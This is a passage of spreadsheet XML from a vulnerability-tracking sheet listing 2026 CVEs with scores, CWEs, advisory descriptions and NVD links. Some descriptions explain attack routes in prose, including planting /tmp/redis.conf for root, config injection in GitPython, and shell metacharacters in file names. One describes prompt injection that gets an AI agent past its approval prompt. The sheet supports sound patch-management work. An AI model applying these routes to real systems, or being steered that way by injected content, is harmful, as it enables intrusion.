          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2968" s="5" t="inlineStr"/>
      <c r="K2968" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2968" s="5" t="inlineStr">
        <is>
          <t>Dell Secure Connect Gateway (SCG) 5.0 Application, versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to remote execution.</t>
        </is>
      </c>
      <c r="M2968" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61409</t>
        </is>
      </c>
    </row>
    <row r="2969">
      <c r="A2969" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2969" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63404</t>
        </is>
      </c>
      <c r="C2969" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2969" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2969" s="5" t="inlineStr"/>
      <c r="F2969" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2969" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H2969" s="5" t="inlineStr"/>
      <c r="I2969" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2969" s="5" t="inlineStr"/>
      <c r="K2969" s="5" t="inlineStr">
        <is>
          <t>CWE-377</t>
        </is>
      </c>
      <c r="L2969" s="5" t="inlineStr">
        <is>
          <t>Faktory is a language-agnostic background job server. In versions prior to 1.10.0, the embedded Redis bootstrapper is vulnerable to an insecure temporary file flaw that lets a local unprivileged user hijack the Redis configuration and escalate to root. It writes its startup configuration to a fixed, predictable, world-writable path, /tmp/redis.conf, only creating the file if it does not already exist and never validating it on later boots. Because /tmp is world-writable, a local unprivileged user can pre-create /tmp/redis.conf with attacker-chosen Redis directives before Faktory starts, and Faktory will use the planted file verbatim. Faktory only overrides the unixsocket, dir, and logfile options, leaving directives such as bind, protected-mode, requirepass, and loadmodule attacker-controlled. This lets an attacker silently expose the entire job queue over an unauthenticated network port with no visible error to the administrator. Because the official systemd unit runs Faktory, and the redis-server child it spawns, as root, an attacker can also supply a loadmodule directive to execute arbitrary native code in the root-owned Redis process, escalating from a local unprivileged user to root. This issue is fixed in version 1.10.0.</t>
        </is>
      </c>
      <c r="M2969" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63404</t>
        </is>
      </c>
    </row>
    <row r="2970">
      <c r="A2970" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2970" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67326</t>
        </is>
      </c>
      <c r="C2970" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2970" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2970" s="5" t="inlineStr"/>
      <c r="F2970" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2970" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2970" s="5" t="inlineStr"/>
      <c r="I2970" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J2970" s="5" t="inlineStr"/>
      <c r="K2970" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L2970" s="5" t="inlineStr">
        <is>
          <t>GitPython before 3.1.50 fails to validate newline characters in the section parameter of config_writer(), allowing attackers to inject arbitrary section headers into .git/config. Attackers can inject newlines to create a forged [core] section with hooksPath pointing to attacker-controlled directories, achieving remote code execution when git hooks are triggered.</t>
        </is>
      </c>
      <c r="M2970" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67326</t>
        </is>
      </c>
    </row>
    <row r="2971">
      <c r="A2971" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2971" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67434</t>
        </is>
      </c>
      <c r="C2971" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2971" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2971" s="5" t="inlineStr"/>
      <c r="F2971" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2971" s="5" t="inlineStr"/>
      <c r="H2971" s="5" t="inlineStr"/>
      <c r="I2971" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2971" s="5" t="inlineStr"/>
      <c r="K2971" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2971" s="5" t="inlineStr">
        <is>
          <t>PHP_CodeSniffer tokenizes PHP files and detects violations of a defined set of coding standards. Prior to versions 3.13.6 and 4.0.2, PHP_CodeSniffer contains a command injection vulnerability in the code that generates the Gitblame, Hgblame, and Svnblame report formats. As a result, running PHP_CodeSniffer over untrusted files, for example in a continuous integration pipeline that scans pull requests, or on a developer machine reviewing third party code, could result in attacker controlled shell commands being executed when the Gitblame, Hgblame, or Svnblame report processes a file whose name contains shell metacharacters. Users using the default Full report, or any of the other non-blame reports, are not affected. Users on a runtime platform which does not allow filenames to contain shell metacharacters, such as " and ;, are not affected. This issue is fixed in versions 3.13.6 and 4.0.2.</t>
        </is>
      </c>
      <c r="M2971" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67434</t>
        </is>
      </c>
    </row>
    <row r="2972">
      <c r="A2972" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2972" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69097</t>
        </is>
      </c>
      <c r="C2972" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2972" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2972" s="5" t="inlineStr"/>
      <c r="F2972" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2972" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2972" s="5" t="inlineStr"/>
      <c r="I2972" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J2972" s="5" t="inlineStr"/>
      <c r="K2972" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L2972" s="5" t="inlineStr">
        <is>
          <t>GitPython before 3.1.53 fails to properly escape section names in git config files, allowing attackers to inject arbitrary configuration directives through malicious submodule names. Attackers can inject core.sshCommand or other dangerous config keys into the victim's .git/config via create_submodule or clone_from operations, achieving remote code execution when git performs ssh operations.</t>
        </is>
      </c>
      <c r="M2972" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69097</t>
        </is>
      </c>
    </row>
    <row r="2973">
      <c r="A2973" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2973" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69477</t>
        </is>
      </c>
      <c r="C2973" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2973" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2973" s="5" t="inlineStr"/>
      <c r="F2973" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2973" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2973" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2973" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2973" s="5" t="inlineStr"/>
      <c r="K2973" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2973" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Access allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2973" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69477</t>
        </is>
      </c>
    </row>
    <row r="2974">
      <c r="A2974" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2974" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71417</t>
        </is>
      </c>
      <c r="C2974" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2974" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2974" s="5" t="inlineStr"/>
      <c r="F2974" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2974" s="5" t="inlineStr"/>
      <c r="H2974" s="5" t="inlineStr"/>
      <c r="I2974" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2974" s="5" t="inlineStr"/>
      <c r="K2974" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2974" s="5" t="inlineStr">
        <is>
          <t>Lemur manages TLS certificate creation. Prior to 1.9.3, POST /api/1/certificates/upload allowed a non-read-only user to create a duplicate row using another certificate body, authority_id, serial, or external_id without requiring permission on the underlying authority. PUT /api/1/certificates//revoke authorized the caller against only the selected Lemur row, so the creator of the duplicate bypassed CertificatePermission. The duplicate had no cert.endpoints, which also bypassed the safeguard that prevents revocation of deployed certificates. Issuer plugins then revoked the real CA-side certificate using certificate.body or external_id under the stored authority credentials. An attacker could therefore revoke arbitrary managed certificates and cause fleet-wide TLS denial of service. The fix rejects duplicate authority_id and serial identities, requires authority access on upload, and checks every matching row during revocation. This issue is fixed in version 1.9.3.</t>
        </is>
      </c>
      <c r="M2974" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71417</t>
        </is>
      </c>
    </row>
    <row r="2975">
      <c r="A2975" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2975" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72913</t>
        </is>
      </c>
      <c r="C2975" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2975" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2975" s="5" t="inlineStr"/>
      <c r="F2975" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2975" s="5" t="inlineStr"/>
      <c r="H2975" s="5" t="inlineStr"/>
      <c r="I2975" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J2975" s="5" t="inlineStr"/>
      <c r="K2975" s="5" t="inlineStr">
        <is>
          <t>CWE-150, CWE-77, CWE-93</t>
        </is>
      </c>
      <c r="L2975" s="5" t="inlineStr">
        <is>
          <t>Kitty is a cross-platform GPU based terminal. Prior to 0.48.2, the @kitty-echo and @kitty-ssh DCS handlers in kitty/window.py write unauthenticated data to the child shell's stdin, where handle_remote_echo accepts printable shell command characters and handle_remote_ssh calls get_ssh_data in kittens/ssh/utils.py, which emits a newline; chaining the handlers can execute attacker-controlled commands when a user displays untrusted terminal data. This issue is fixed in version 0.48.2.</t>
        </is>
      </c>
      <c r="M2975" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72913</t>
        </is>
      </c>
    </row>
    <row r="2976">
      <c r="A2976" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2976" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75857</t>
        </is>
      </c>
      <c r="C2976" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2976" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2976" s="5" t="inlineStr"/>
      <c r="F2976" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2976" s="5" t="inlineStr">
        <is>
          <t>python, mysql</t>
        </is>
      </c>
      <c r="H2976" s="5" t="inlineStr"/>
      <c r="I2976" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2976" s="5" t="inlineStr"/>
      <c r="K2976" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L2976" s="5" t="inlineStr">
        <is>
          <t>CodeWhale versions &gt;= 0.8.41 and &lt; 0.8.64 contain a vulnerability in the exec_shell_interact (alias exec_interact) tool, whose approval_requirement returns ApprovalRequirement::Auto. This overrides the default Required approval for code-executing tools, so LLM-controlled stdin is written into an already-approved long-running interactive shell (e.g., a python3 -i REPL, mysql, ssh, or sudo -i session) without any approval prompt. An attacker who can inject instructions via untrusted content the agent ingests (a fetched page, MCP result, or repo file) can cause commands to run at the privilege level of that approved process. Fixed in 0.8.64.</t>
        </is>
      </c>
      <c r="M2976" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75857</t>
        </is>
      </c>
    </row>
    <row r="2977">
      <c r="A2977" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2977" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77092</t>
        </is>
      </c>
      <c r="C2977" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2977" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2977" s="5" t="inlineStr"/>
      <c r="F2977" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2977" s="5" t="inlineStr"/>
      <c r="H2977" s="5" t="inlineStr"/>
      <c r="I2977" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2977" s="5" t="inlineStr"/>
      <c r="K2977" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L2977" s="5" t="inlineStr">
        <is>
          <t>Content Extractor contained a deserialization of untrusted data issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Content Extractor.</t>
        </is>
      </c>
      <c r="M2977" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77092</t>
        </is>
      </c>
    </row>
    <row r="2978">
      <c r="A2978" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2978" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78485</t>
        </is>
      </c>
      <c r="C2978" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2978" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2978" s="5" t="inlineStr"/>
      <c r="F2978" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2978" s="5" t="inlineStr"/>
      <c r="H2978" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2978" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2978" s="5" t="inlineStr"/>
      <c r="K2978" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2978"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Unauthorized access</t>
        </is>
      </c>
      <c r="M2978" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78485</t>
        </is>
      </c>
    </row>
    <row r="2979">
      <c r="A2979" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2979" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78627</t>
        </is>
      </c>
      <c r="C2979" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2979" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2979" s="5" t="inlineStr"/>
      <c r="F2979" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2979" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H2979" s="5" t="inlineStr"/>
      <c r="I2979" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2979" s="5" t="inlineStr"/>
      <c r="K2979" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L2979" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M2979" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78627</t>
        </is>
      </c>
    </row>
    <row r="2980">
      <c r="A2980" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2980" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79635</t>
        </is>
      </c>
      <c r="C2980" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2980" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2980" s="5" t="inlineStr"/>
      <c r="F2980" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2980" s="5" t="inlineStr"/>
      <c r="H2980" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2980" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2980" s="5" t="inlineStr"/>
      <c r="K2980" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2980"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unauthorized access.</t>
        </is>
      </c>
      <c r="M2980" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79635</t>
        </is>
      </c>
    </row>
    <row r="2981">
      <c r="A2981" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2981" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79643</t>
        </is>
      </c>
      <c r="C2981" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2981" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2981" s="5" t="inlineStr"/>
      <c r="F2981" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2981" s="5" t="inlineStr"/>
      <c r="H2981" s="5" t="inlineStr"/>
      <c r="I2981" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2981" s="5" t="inlineStr"/>
      <c r="K2981" s="5" t="inlineStr">
        <is>
          <t>CWE-480</t>
        </is>
      </c>
      <c r="L2981" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Use of Incorrect Operator vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="M2981" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79643</t>
        </is>
      </c>
    </row>
    <row r="2982">
      <c r="A2982" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2982" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79691</t>
        </is>
      </c>
      <c r="C2982" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2982" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2982" s="5" t="inlineStr"/>
      <c r="F2982" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2982" s="5" t="inlineStr"/>
      <c r="H2982" s="5" t="inlineStr"/>
      <c r="I2982" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2982" s="5" t="inlineStr"/>
      <c r="K2982" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L298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M2982" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79691</t>
        </is>
      </c>
    </row>
    <row r="2983">
      <c r="A2983" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2983" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79692</t>
        </is>
      </c>
      <c r="C2983" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2983" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2983" s="5" t="inlineStr"/>
      <c r="F2983" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2983" s="5" t="inlineStr"/>
      <c r="H2983" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2983" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2983" s="5" t="inlineStr"/>
      <c r="K2983" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L2983" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an External Control of File Name or Path vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to filesystem access for attacker.</t>
        </is>
      </c>
      <c r="M2983" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79692</t>
        </is>
      </c>
    </row>
    <row r="2984">
      <c r="A2984" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2984" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79695</t>
        </is>
      </c>
      <c r="C2984" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2984" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2984" s="5" t="inlineStr"/>
      <c r="F2984" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2984" s="5" t="inlineStr"/>
      <c r="H2984" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2984" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2984" s="5" t="inlineStr"/>
      <c r="K2984" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L2984" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Handling of Highly Compressed Data (Data Amplification) vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to denial of service.</t>
        </is>
      </c>
      <c r="M2984" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79695</t>
        </is>
      </c>
    </row>
    <row r="2985">
      <c r="A2985" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2985" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80122</t>
        </is>
      </c>
      <c r="C2985" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2985" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2985" s="5" t="inlineStr"/>
      <c r="F2985" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2985" s="5" t="inlineStr"/>
      <c r="H2985" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2985" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2985" s="5" t="inlineStr"/>
      <c r="K2985" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2985"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2985" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80122</t>
        </is>
      </c>
    </row>
    <row r="2986">
      <c r="A2986" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2986" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80219</t>
        </is>
      </c>
      <c r="C2986" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2986" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2986" s="5" t="inlineStr"/>
      <c r="F2986" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2986" s="5" t="inlineStr"/>
      <c r="H2986" s="5" t="inlineStr"/>
      <c r="I2986" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2986" s="5" t="inlineStr"/>
      <c r="K2986" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="L2986" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in hawtio-operator. When deploying Hawtio in cluster mode, the operator creates a cluster-scoped OAuthClient with automatic grant approval (GrantMethod: auto) and no client secret (public client). The redirect URIs are derived from the operator-created Route, whose hostname is tenant-controlled via the Hawtio CR spec.routeHostName field. A malicious tenant can register an arbitrary hostname as a valid OAuth redirect target and, because grants are auto-approved, obtain OpenShift access tokens of any cluster user who visits the crafted authorization URL without any consent prompt.</t>
        </is>
      </c>
      <c r="M2986" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80219</t>
        </is>
      </c>
    </row>
    <row r="2987">
      <c r="A2987" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2987" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81796</t>
        </is>
      </c>
      <c r="C2987" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2987" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2987" s="5" t="inlineStr"/>
      <c r="F2987" s="5" t="inlineStr"/>
      <c r="G2987" s="5" t="inlineStr"/>
      <c r="H2987" s="5" t="inlineStr"/>
      <c r="I2987" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2987" s="5" t="inlineStr"/>
      <c r="K2987" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L2987" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Authentication in WP Travel &lt;= 12.0.3 versions.</t>
        </is>
      </c>
      <c r="M2987" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81796</t>
        </is>
      </c>
    </row>
    <row r="2988">
      <c r="A2988" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2988" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85028</t>
        </is>
      </c>
      <c r="C2988" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2988" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2988" s="5" t="inlineStr"/>
      <c r="F2988" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2988" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H2988" s="5" t="inlineStr"/>
      <c r="I2988" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2988" s="5" t="inlineStr"/>
      <c r="K2988" s="5" t="inlineStr">
        <is>
          <t>CWE-379</t>
        </is>
      </c>
      <c r="L2988" s="5" t="inlineStr">
        <is>
          <t>Creation of a temporary file in a directory with insecure permissions in the FPGA management tool installation component in AWS FPGA Development Kit (aws-fpga) before 2.3.4 might allow local users to execute arbitrary code with root privileges via crafted shell content placed at a predictable path in a world-writable temporary directory, which the installation step reads after elevating its own privileges.
To remediate this issue, users should upgrade to version 2.3.4.</t>
        </is>
      </c>
      <c r="M2988" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85028</t>
        </is>
      </c>
    </row>
    <row r="2989">
      <c r="A2989" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2989" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88017</t>
        </is>
      </c>
      <c r="C2989" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2989" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2989" s="5" t="inlineStr"/>
      <c r="F2989" s="5" t="inlineStr"/>
      <c r="G2989" s="5" t="inlineStr"/>
      <c r="H2989" s="5" t="inlineStr"/>
      <c r="I2989" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2989" s="5" t="inlineStr"/>
      <c r="K2989" s="5" t="inlineStr">
        <is>
          <t>CWE-488</t>
        </is>
      </c>
      <c r="L2989"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M2989" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88017</t>
        </is>
      </c>
    </row>
    <row r="2990">
      <c r="A2990" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2990" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88885</t>
        </is>
      </c>
      <c r="C2990" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2990" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2990" s="5" t="inlineStr"/>
      <c r="F2990" s="5" t="inlineStr"/>
      <c r="G2990" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
